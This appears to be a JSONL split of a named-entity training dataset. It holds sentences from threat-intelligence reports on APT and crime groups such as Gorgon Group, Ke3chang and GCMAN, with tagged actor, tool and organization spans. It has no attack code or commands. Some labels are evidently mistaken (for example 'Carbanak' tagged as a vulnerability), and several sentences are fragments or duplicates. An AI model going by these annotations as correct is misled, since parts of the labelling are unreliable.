{"text": "The earliest discovered sample ( based on compile times and sandbox submission times ) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro .", "spans": {"THREAT_ACTOR: threat group": [[107, 119]], "THREAT_ACTOR: Gamaredon": [[150, 159]], "ORGANIZATION: Symantec": [[172, 180]], "ORGANIZATION: Trend Micro": [[185, 196]]}, "info": {"id": "dnrti_train_000398", "source": "dnrti_train"}}
{"text": "The scripts would also use wget to send POST requests to command and control ( C2 ) servers that would contain information about the compromised system .", "spans": {"TOOL: wget": [[27, 31]]}, "info": {"id": "dnrti_train_000399", "source": "dnrti_train"}}
{"text": "The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system .", "spans": {"TOOL: VNC": [[48, 51]]}, "info": {"id": "dnrti_train_000401", "source": "dnrti_train"}}
{"text": "While the most recent samples observed still use batch scripts and SFX files , the Gamaredon Group has moved away from applications like wget , Remote Manipulator Tool , VNC and ChkFlsh.exe .", "spans": {"TOOL: batch scripts": [[49, 62]], "TOOL: SFX files": [[67, 76]], "THREAT_ACTOR: Gamaredon Group": [[83, 98]], "TOOL: wget": [[137, 141]], "TOOL: Remote Manipulator Tool": [[144, 167]], "TOOL: VNC": [[170, 173]], "TOOL: ChkFlsh.exe": [[178, 189]]}, "info": {"id": "dnrti_train_000402", "source": "dnrti_train"}}
{"text": "The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government .", "spans": {"THREAT_ACTOR: threat group": [[4, 16]]}, "info": {"id": "dnrti_train_000403", "source": "dnrti_train"}}
{"text": "Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon .", "spans": {"THREAT_ACTOR: Gamaredon": [[127, 136]]}, "info": {"id": "dnrti_train_000404", "source": "dnrti_train"}}
{"text": "Periodically , researchers at Palo Alto Networks hunt through WildFire execution reports , using AutoFocus , to identify untagged samples ' artifacts in the hopes of identifying previously undiscovered malware families , behaviors , and campaigns .", "spans": {"ORGANIZATION: Palo Alto Networks": [[30, 48]], "ORGANIZATION: WildFire": [[62, 70]]}, "info": {"id": "dnrti_train_000405", "source": "dnrti_train"}}
{"text": "Today at the Security Analyst Summit ( SAS 2016 ) , Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights .", "spans": {"ORGANIZATION: Kaspersky Lab": [[52, 65]], "THREAT_ACTOR: Metel": [[149, 154]], "THREAT_ACTOR: GCMAN": [[159, 164]], "THREAT_ACTOR: Carbanak group": [[194, 208]]}, "info": {"id": "dnrti_train_000407", "source": "dnrti_train"}}
{"text": "In 2015 , Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups .", "spans": {"ORGANIZATION: Kaspersky Lab": [[10, 23]], "THREAT_ACTOR: groups": [[131, 137]]}, "info": {"id": "dnrti_train_000408", "source": "dnrti_train"}}
{"text": "Kaspersky Lab is releasing crucial Indicators of Compromise ( IOCs ) and other data to help organizations search for traces of these attack groups in their corporate networks .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "THREAT_ACTOR: attack groups": [[133, 146]]}, "info": {"id": "dnrti_train_000409", "source": "dnrti_train"}}
{"text": "In all , Kaspersky Lab discovered Metel in more than 30 financial institutions .", "spans": {"ORGANIZATION: Kaspersky Lab": [[9, 22]], "THREAT_ACTOR: Metel": [[34, 39]], "ORGANIZATION: financial institutions": [[56, 78]]}, "info": {"id": "dnrti_train_000410", "source": "dnrti_train"}}
{"text": "It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware .", "spans": {"ORGANIZATION: financial institutions": [[72, 94]], "TOOL: Metel malware": [[152, 165]]}, "info": {"id": "dnrti_train_000411", "source": "dnrti_train"}}
{"text": "A second group , which we call GCMAN because the malware is based on code compiled on the GCC compiler , emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services .", "spans": {"THREAT_ACTOR: group": [[9, 14]], "THREAT_ACTOR: GCMAN": [[31, 36]], "THREAT_ACTOR: Metel Group": [[154, 165]], "ORGANIZATION: banking institutions": [[176, 196]]}, "info": {"id": "dnrti_train_000412", "source": "dnrti_train"}}
{"text": "Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks .", "spans": {"THREAT_ACTOR: attackers": [[37, 46]]}, "info": {"id": "dnrti_train_000413", "source": "dnrti_train"}}
{"text": "Once inside the network , the GCMAN group uses legitimate and penetration testing tools such as Putty , VNC , and Meterpreter for lateral movement .", "spans": {"THREAT_ACTOR: GCMAN group": [[30, 41]], "TOOL: Putty": [[96, 101]], "TOOL: VNC": [[104, 107]], "TOOL: Meterpreter": [[114, 125]]}, "info": {"id": "dnrti_train_000414", "source": "dnrti_train"}}
{"text": "During that time they poked 70 internal hosts , compromised 56 accounts , making their way from 139 attack sources ( TOR and compromised home routers ) .", "spans": {}, "info": {"id": "dnrti_train_000417", "source": "dnrti_train"}}
{"text": "Kaspersky Lab 's research team responded to three financial institutions in Russia that were infected with the GCMAN malware .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "ORGANIZATION: financial institutions": [[50, 72]], "TOOL: GCMAN malware": [[111, 124]]}, "info": {"id": "dnrti_train_000419", "source": "dnrti_train"}}
{"text": "In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": {"VULNERABILITY: Carbanak": [[29, 37]], "ORGANIZATION: financial institution": [[68, 89]]}, "info": {"id": "dnrti_train_000420", "source": "dnrti_train"}}
{"text": "Recently Subaat drew our attention due to renewed targeted attack activity .", "spans": {"THREAT_ACTOR: Subaat": [[9, 15]]}, "info": {"id": "dnrti_train_000421", "source": "dnrti_train"}}
{"text": "Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec , in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking , which we are calling Gorgon Group .", "spans": {"THREAT_ACTOR: actors": [[85, 91]], "ORGANIZATION: 360": [[122, 125]], "ORGANIZATION: Tuisec": [[130, 136]], "THREAT_ACTOR: group": [[195, 200]], "THREAT_ACTOR: attackers": [[204, 213]], "ORGANIZATION: Unit 42": [[214, 221]], "THREAT_ACTOR: Gorgon Group": [[276, 288]]}, "info": {"id": "dnrti_train_000422", "source": "dnrti_train"}}
{"text": "Starting in February 2018 , Palo Alto Networks identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: Palo Alto Networks": [[28, 46]], "THREAT_ACTOR: Gorgon Group": [[104, 116]], "ORGANIZATION: governmental organizations": [[127, 153]]}, "info": {"id": "dnrti_train_000423", "source": "dnrti_train"}}
{"text": "Starting in February 2018 , Palo Alto Networks Unit 42 identified a", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[28, 54]]}, "info": {"id": "dnrti_train_000424", "source": "dnrti_train"}}
{"text": "of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"THREAT_ACTOR: Gorgon Group": [[35, 47]], "ORGANIZATION: governmental organizations": [[58, 84]]}, "info": {"id": "dnrti_train_000425", "source": "dnrti_train"}}
{"text": "The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": {"THREAT_ACTOR: GCMAN group": [[4, 15]], "ORGANIZATION: budgeting": [[64, 73]], "ORGANIZATION: accounting departments": [[78, 100]]}, "info": {"id": "dnrti_train_000426", "source": "dnrti_train"}}
{"text": "Starting in February 2018 , Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: Unit 42": [[28, 35]], "THREAT_ACTOR: Gorgon Group": [[93, 105]], "ORGANIZATION: governmental organizations": [[116, 142]]}, "info": {"id": "dnrti_train_000427", "source": "dnrti_train"}}
{"text": "APT38 's increasingly aggressive targeting against banks .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]]}, "info": {"id": "dnrti_train_000428", "source": "dnrti_train"}}
{"text": "APT38 has paralleled North Korea 's worsening financial condition .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]]}, "info": {"id": "dnrti_train_000431", "source": "dnrti_train"}}
{"text": "On much of the C2 infrastructure we identified several crimeware family samples .", "spans": {}, "info": {"id": "dnrti_train_000432", "source": "dnrti_train"}}
{"text": "While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns .", "spans": {"THREAT_ACTOR: Gorgon Group": [[86, 98]], "ORGANIZATION: Unit 42": [[101, 108]], "THREAT_ACTOR: Gorgon Group 's actors": [[178, 200]]}, "info": {"id": "dnrti_train_000433", "source": "dnrti_train"}}
{"text": "360 and Tuisec already identified some Gorgon Group members .", "spans": {"ORGANIZATION: 360": [[0, 3]], "ORGANIZATION: Tuisec": [[8, 14]], "THREAT_ACTOR: Gorgon Group": [[39, 51]], "ORGANIZATION: members": [[52, 59]]}, "info": {"id": "dnrti_train_000434", "source": "dnrti_train"}}
{"text": "RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks .", "spans": {"TOOL: RATs": [[0, 4]], "TOOL: NjRat": [[13, 18]], "TOOL: Lokibot": [[41, 48]]}, "info": {"id": "dnrti_train_000435", "source": "dnrti_train"}}
{"text": "it 's not known if the attackers physically reside in Pakistan .", "spans": {"THREAT_ACTOR: attackers": [[23, 32]]}, "info": {"id": "dnrti_train_000436", "source": "dnrti_train"}}
{"text": "While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas .", "spans": {"THREAT_ACTOR: attackers": [[29, 38]], "THREAT_ACTOR: Gorgon Group": [[86, 98]]}, "info": {"id": "dnrti_train_000438", "source": "dnrti_train"}}
{"text": "Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure leveraged by Gorgon Group for criminal and targeted attacks .", "spans": {"ORGANIZATION: Unit 42": [[27, 34]], "THREAT_ACTOR: Gorgon Group": [[146, 158]]}, "info": {"id": "dnrti_train_000439", "source": "dnrti_train"}}
{"text": "Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: Gorgon Group": [[39, 51]]}, "info": {"id": "dnrti_train_000440", "source": "dnrti_train"}}
{"text": "As part of the investigation , Unit 42 researchers were able to identify an interesting characteristic about how the Gorgon Group crew uses shared infrastructure between cybercrime and targeted attacks .", "spans": {"ORGANIZATION: Unit 42": [[31, 38]], "THREAT_ACTOR: Gorgon Group": [[117, 129]], "TOOL: shared infrastructure": [[140, 161]]}, "info": {"id": "dnrti_train_000441", "source": "dnrti_train"}}
{"text": "The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs .", "spans": {"TOOL: domain infrastructure": [[83, 104]]}, "info": {"id": "dnrti_train_000442", "source": "dnrti_train"}}
{"text": "One interesting note about the criminal activity of Gorgon Group is their usage of Bitly .", "spans": {"THREAT_ACTOR: Gorgon Group": [[52, 64]], "TOOL: Bitly": [[83, 88]]}, "info": {"id": "dnrti_train_000443", "source": "dnrti_train"}}
{"text": "Between April 1 , 2018 and May 30 , 2018 , we observed the domain stevemike-fireforce.info used in a Gorgon Group cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack .", "spans": {}, "info": {"id": "dnrti_train_000444", "source": "dnrti_train"}}
{"text": "Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains .", "spans": {"THREAT_ACTOR: Gorgon Group": [[44, 56]], "TOOL: Bitly": [[67, 72]]}, "info": {"id": "dnrti_train_000445", "source": "dnrti_train"}}
{"text": "Beginning in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": {"ORGANIZATION: Unit 42": [[32, 39]], "ORGANIZATION: government agencies": [[119, 138]]}, "info": {"id": "dnrti_train_000446", "source": "dnrti_train"}}
{"text": "Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April .", "spans": {"TOOL: Bitly": [[45, 50]], "THREAT_ACTOR: Gorgon Group": [[73, 85]]}, "info": {"id": "dnrti_train_000447", "source": "dnrti_train"}}
{"text": "As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan .", "spans": {"THREAT_ACTOR: Gorgon Group": [[57, 69]], "ORGANIZATION: governmental organizations": [[112, 138]]}, "info": {"id": "dnrti_train_000448", "source": "dnrti_train"}}
{"text": "Starting in mid-February .", "spans": {}, "info": {"id": "dnrti_train_000449", "source": "dnrti_train"}}
{"text": "Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations .", "spans": {"THREAT_ACTOR: Gorgon Group": [[45, 57]], "TOOL: shared infrastructure": [[146, 167]]}, "info": {"id": "dnrti_train_000450", "source": "dnrti_train"}}
{"text": "Unit 42 researchers have been tracking an active campaign .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]]}, "info": {"id": "dnrti_train_000451", "source": "dnrti_train"}}
{"text": "Beginning in early March 2018 , Unit 42 started observing Gorgon group attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": {"ORGANIZATION: Unit 42": [[32, 39]], "ORGANIZATION: government agencies": [[123, 142]]}, "info": {"id": "dnrti_train_000453", "source": "dnrti_train"}}
{"text": "Like all of Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group .", "spans": {"THREAT_ACTOR: Gorgon Group": [[12, 24], [137, 149]], "TOOL: infrastructure utilization": [[66, 92]], "TOOL: standardization": [[97, 112]]}, "info": {"id": "dnrti_train_000454", "source": "dnrti_train"}}
{"text": "Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan .", "spans": {"THREAT_ACTOR: Gorgon Group": [[60, 72]]}, "info": {"id": "dnrti_train_000455", "source": "dnrti_train"}}
{"text": "Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks .", "spans": {"THREAT_ACTOR: Gorgon Group": [[0, 12]], "THREAT_ACTOR: actor group": [[29, 40]]}, "info": {"id": "dnrti_train_000456", "source": "dnrti_train"}}
{"text": "Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work .", "spans": {"THREAT_ACTOR: Gorgon Group": [[52, 64]]}, "info": {"id": "dnrti_train_000457", "source": "dnrti_train"}}
{"text": "On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor .", "spans": {"ORGANIZATION: Advanced Threat Research": [[16, 40]], "TOOL: SYSCON backdoor": [[92, 107]]}, "info": {"id": "dnrti_train_000458", "source": "dnrti_train"}}
{"text": "The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": {"TOOL: Word document": [[20, 33]], "MALWARE: manual.doc": [[34, 44]], "THREAT_ACTOR: Honeybee": [[114, 122]]}, "info": {"id": "dnrti_train_000459", "source": "dnrti_train"}}
{"text": "While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks .", "spans": {"THREAT_ACTOR: Gorgon Group": [[6, 18]]}, "info": {"id": "dnrti_train_000460", "source": "dnrti_train"}}
{"text": "This key was also used in the Honeybee campaign and appears to have been used since August 2017 .", "spans": {}, "info": {"id": "dnrti_train_000462", "source": "dnrti_train"}}
{"text": "Several additional documents surfaced between January 17 and February 3 .", "spans": {}, "info": {"id": "dnrti_train_000463", "source": "dnrti_train"}}
{"text": "Some of the malicious documents were test files without the implant .", "spans": {"TOOL: test files": [[37, 47]]}, "info": {"id": "dnrti_train_000465", "source": "dnrti_train"}}
{"text": "From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea .", "spans": {"THREAT_ACTOR: Honeybee": [[20, 28]]}, "info": {"id": "dnrti_train_000466", "source": "dnrti_train"}}
{"text": "Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": {"THREAT_ACTOR: Honeybee": [[0, 8]]}, "info": {"id": "dnrti_train_000467", "source": "dnrti_train"}}
{"text": "Honeybee appears to target humanitarian aid and inter-Korean affairs .", "spans": {"THREAT_ACTOR: Honeybee": [[0, 8]]}, "info": {"id": "dnrti_train_000468", "source": "dnrti_train"}}
{"text": "McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[0, 31]], "TOOL: SYSCON backdoor": [[202, 217]]}, "info": {"id": "dnrti_train_000469", "source": "dnrti_train"}}
{"text": "Large-scale cyber espionage campaigns such as \" GhostNet \" .", "spans": {}, "info": {"id": "dnrti_train_000470", "source": "dnrti_train"}}
{"text": "As the crisis in Syria escalates , FireEye researchers have discovered a cyber espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": {"ORGANIZATION: FireEye": [[35, 42]], "THREAT_ACTOR: Ke3chang": [[116, 124]]}, "info": {"id": "dnrti_train_000471", "source": "dnrti_train"}}
{"text": "As the crisis in Syria escalates , FireEye researchers have discovered a threat group , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": {"ORGANIZATION: FireEye": [[35, 42]], "THREAT_ACTOR: threat group": [[73, 85]], "THREAT_ACTOR: Ke3chang": [[104, 112]]}, "info": {"id": "dnrti_train_000472", "source": "dnrti_train"}}
{"text": "We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 .", "spans": {"THREAT_ACTOR: Ke3chang": [[20, 28]], "THREAT_ACTOR: attackers": [[29, 38]]}, "info": {"id": "dnrti_train_000473", "source": "dnrti_train"}}
{"text": "FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: command-and-control": [[47, 66]], "TOOL: CnC": [[69, 72]], "THREAT_ACTOR: Ke3chang actor": [[99, 113]]}, "info": {"id": "dnrti_train_000474", "source": "dnrti_train"}}
{"text": "Each attack comprises a variety of phases , including reconnaissance , exploitation , command and control , lateral movement , and exfiltration .", "spans": {}, "info": {"id": "dnrti_train_000475", "source": "dnrti_train"}}
{"text": "The Ke3chang attackers have been active since at least 2010 .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "THREAT_ACTOR: attackers": [[13, 22]]}, "info": {"id": "dnrti_train_000476", "source": "dnrti_train"}}
{"text": "traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": {"ORGANIZATION: mining sectors": [[127, 141]]}, "info": {"id": "dnrti_train_000477", "source": "dnrti_train"}}
{"text": "The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "ORGANIZATION: mining sectors": [[193, 207]]}, "info": {"id": "dnrti_train_000478", "source": "dnrti_train"}}
{"text": "August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers .", "spans": {"ORGANIZATION: FireEye": [[14, 21]], "THREAT_ACTOR: Ke3chang": [[90, 98]], "THREAT_ACTOR: attackers": [[99, 108]]}, "info": {"id": "dnrti_train_000479", "source": "dnrti_train"}}
{"text": "In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs .", "spans": {}, "info": {"id": "dnrti_train_000480", "source": "dnrti_train"}}
{"text": "Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" .", "spans": {"THREAT_ACTOR: Ke3chang": [[21, 29]], "THREAT_ACTOR: attackers": [[30, 39]], "TOOL: BS2005": [[90, 96]], "TOOL: BMW": [[103, 106]], "TOOL: MyWeb": [[117, 122]]}, "info": {"id": "dnrti_train_000484", "source": "dnrti_train"}}
{"text": "it is a typical first stage backdoor commonly found in APT attacks .", "spans": {}, "info": {"id": "dnrti_train_000485", "source": "dnrti_train"}}
{"text": "The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: mining sectors": [[198, 212]]}, "info": {"id": "dnrti_train_000486", "source": "dnrti_train"}}
{"text": "All of the CnC communications are performed over the HTTP protocol .", "spans": {"TOOL: HTTP protocol": [[53, 66]]}, "info": {"id": "dnrti_train_000487", "source": "dnrti_train"}}
{"text": "The current Ke3chang campaign leverages the BS2005 malware , while older activity from 2010 - 2011 leveraged BMW , followed by the MyWeb malware sporadically used in between .", "spans": {"TOOL: BS2005 malware": [[44, 58]], "TOOL: BMW": [[109, 112]], "TOOL: MyWeb malware": [[131, 144]]}, "info": {"id": "dnrti_train_000488", "source": "dnrti_train"}}
{"text": "A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication .", "spans": {"TOOL: IWebBrowser2 COM": [[78, 94]]}, "info": {"id": "dnrti_train_000489", "source": "dnrti_train"}}
{"text": "Three months after the Olympics-themed attacks , FireEye observed a new BS2005 campaign labeled \" newtiger \" , which is possibly a reference to an older 2010 campaign labeled \" tiger \" .", "spans": {"ORGANIZATION: FireEye": [[49, 56]]}, "info": {"id": "dnrti_train_000490", "source": "dnrti_train"}}
{"text": "Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm .", "spans": {"ORGANIZATION: FireEye DTI": [[27, 38]], "ORGANIZATION: FireEye": [[47, 54]], "THREAT_ACTOR: Ke3chang": [[69, 77]]}, "info": {"id": "dnrti_train_000491", "source": "dnrti_train"}}
{"text": "The Ke3chang attackers used the older \" MyWeb \" malware family from 2010 to 2011 .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "THREAT_ACTOR: attackers": [[13, 22]], "TOOL: MyWeb": [[40, 45]]}, "info": {"id": "dnrti_train_000492", "source": "dnrti_train"}}
{"text": "The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "THREAT_ACTOR: attackers": [[13, 22]], "TOOL: MyWeb malware": [[38, 51]]}, "info": {"id": "dnrti_train_000493", "source": "dnrti_train"}}
{"text": "During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets .", "spans": {"ORGANIZATION: ministries of foreign affairs": [[87, 116]], "ORGANIZATION: FireEye": [[129, 136]], "THREAT_ACTOR: Ke3chang": [[157, 165]]}, "info": {"id": "dnrti_train_000494", "source": "dnrti_train"}}
{"text": "The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 .", "spans": {"TOOL: MyWeb sample": [[4, 16]], "ORGANIZATION: FireEye": [[22, 29]]}, "info": {"id": "dnrti_train_000495", "source": "dnrti_train"}}
{"text": "At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group .", "spans": {"THREAT_ACTOR: group": [[154, 159]]}, "info": {"id": "dnrti_train_000496", "source": "dnrti_train"}}
{"text": "MyWeb is the second-generation malware used by Ke3chang .", "spans": {"TOOL: MyWeb": [[0, 5]], "THREAT_ACTOR: Ke3chang": [[47, 55]]}, "info": {"id": "dnrti_train_000497", "source": "dnrti_train"}}
{"text": "ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang .", "spans": {"ORGANIZATION: ministries of foreign affairs": [[0, 29]], "THREAT_ACTOR: threat actor": [[80, 92]], "THREAT_ACTOR: Ke3chang": [[101, 109]]}, "info": {"id": "dnrti_train_000498", "source": "dnrti_train"}}
{"text": "This attack used the crisis in Syria as a lure to deliver malware to its targets .", "spans": {}, "info": {"id": "dnrti_train_000499", "source": "dnrti_train"}}
{"text": "Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor .", "spans": {"THREAT_ACTOR: Ke3chang": [[49, 57]], "THREAT_ACTOR: APT group": [[58, 67]], "ORGANIZATION: ESET": [[70, 74]], "THREAT_ACTOR: group": [[150, 155]]}, "info": {"id": "dnrti_train_000500", "source": "dnrti_train"}}
{"text": "Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past .", "spans": {"ORGANIZATION: FireEye": [[14, 21]], "THREAT_ACTOR: Ke3chang": [[65, 73]], "THREAT_ACTOR: attackers": [[74, 83]], "ORGANIZATION: G20 meetings": [[158, 170]]}, "info": {"id": "dnrti_train_000501", "source": "dnrti_train"}}
{"text": "During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks .", "spans": {"ORGANIZATION: FireEye": [[75, 82]], "THREAT_ACTOR: Ke3chang": [[96, 104]]}, "info": {"id": "dnrti_train_000502", "source": "dnrti_train"}}
{"text": "Ke3chang attackers are operating within China .", "spans": {"THREAT_ACTOR: Ke3chang": [[0, 8]], "THREAT_ACTOR: attackers": [[9, 18]]}, "info": {"id": "dnrti_train_000503", "source": "dnrti_train"}}
{"text": "In May 2017 , NCC Group 's Incident Response team reacted to an ongoing incident .", "spans": {"ORGANIZATION: NCC Group 's Incident Response": [[14, 44]]}, "info": {"id": "dnrti_train_000504", "source": "dnrti_train"}}
{"text": "which provides a range of services to UK Government .", "spans": {"ORGANIZATION: UK Government": [[38, 51]]}, "info": {"id": "dnrti_train_000505", "source": "dnrti_train"}}
{"text": "APT15 was targeting information related to UK government departments and military technology .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]]}, "info": {"id": "dnrti_train_000506", "source": "dnrti_train"}}
{"text": "backdoors that now appear to be part of APT15 's toolset .", "spans": {"THREAT_ACTOR: APT15": [[40, 45]]}, "info": {"id": "dnrti_train_000507", "source": "dnrti_train"}}
{"text": "This report demonstrates that Ke3chang is able to successfully penetrate government targets using exploits for vulnerabilities that have already been patched and despite the fact that these ministries have defenses in place .", "spans": {"THREAT_ACTOR: Ke3chang": [[30, 38]]}, "info": {"id": "dnrti_train_000508", "source": "dnrti_train"}}
{"text": "RoyalDNS - required APT15 .", "spans": {"TOOL: RoyalDNS": [[0, 8]], "THREAT_ACTOR: APT15": [[20, 25]]}, "info": {"id": "dnrti_train_000509", "source": "dnrti_train"}}
{"text": "The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes .", "spans": {"THREAT_ACTOR: Ke3chang group": [[4, 18]], "TOOL: keyloggers": [[29, 39]], "TOOL: .NET tool": [[54, 63]]}, "info": {"id": "dnrti_train_000510", "source": "dnrti_train"}}
{"text": "APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "TOOL: Mimikatz": [[30, 38]]}, "info": {"id": "dnrti_train_000511", "source": "dnrti_train"}}
{"text": "This time , APT15 opted for a DNS based backdoor : RoyalDNS .", "spans": {"THREAT_ACTOR: APT15": [[12, 17]], "TOOL: DNS based backdoor": [[30, 48]], "TOOL: RoyalDNS": [[51, 59]]}, "info": {"id": "dnrti_train_000512", "source": "dnrti_train"}}
{"text": "APT15 then used a tool known as RemoteExec .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "TOOL: RemoteExec": [[32, 42]]}, "info": {"id": "dnrti_train_000513", "source": "dnrti_train"}}
{"text": "APT15 then used a tool known as RemoteExec ( similar to Microsoft .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "TOOL: RemoteExec": [[32, 42]], "ORGANIZATION: Microsoft": [[56, 65]]}, "info": {"id": "dnrti_train_000514", "source": "dnrti_train"}}
{"text": "Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 , known for committing cyber espionage which is believed to be affiliated with the Chinese government .", "spans": {"ORGANIZATION: Navy": [[51, 55]], "THREAT_ACTOR: group": [[177, 182]], "THREAT_ACTOR: APT15": [[198, 203]], "THREAT_ACTOR: cyber espionage": [[227, 242]]}, "info": {"id": "dnrti_train_000515", "source": "dnrti_train"}}
{"text": "APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "THREAT_ACTOR: cyberespionage": [[30, 44]], "ORGANIZATION: government contractors": [[174, 196]]}, "info": {"id": "dnrti_train_000516", "source": "dnrti_train"}}
{"text": "Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": {"THREAT_ACTOR: group": [[20, 25]], "THREAT_ACTOR: Vixen Panda": [[30, 41]], "THREAT_ACTOR: Ke3chang": [[44, 52]], "THREAT_ACTOR: Royal APT": [[55, 64]], "THREAT_ACTOR: Playful Dragon": [[71, 85]]}, "info": {"id": "dnrti_train_000517", "source": "dnrti_train"}}
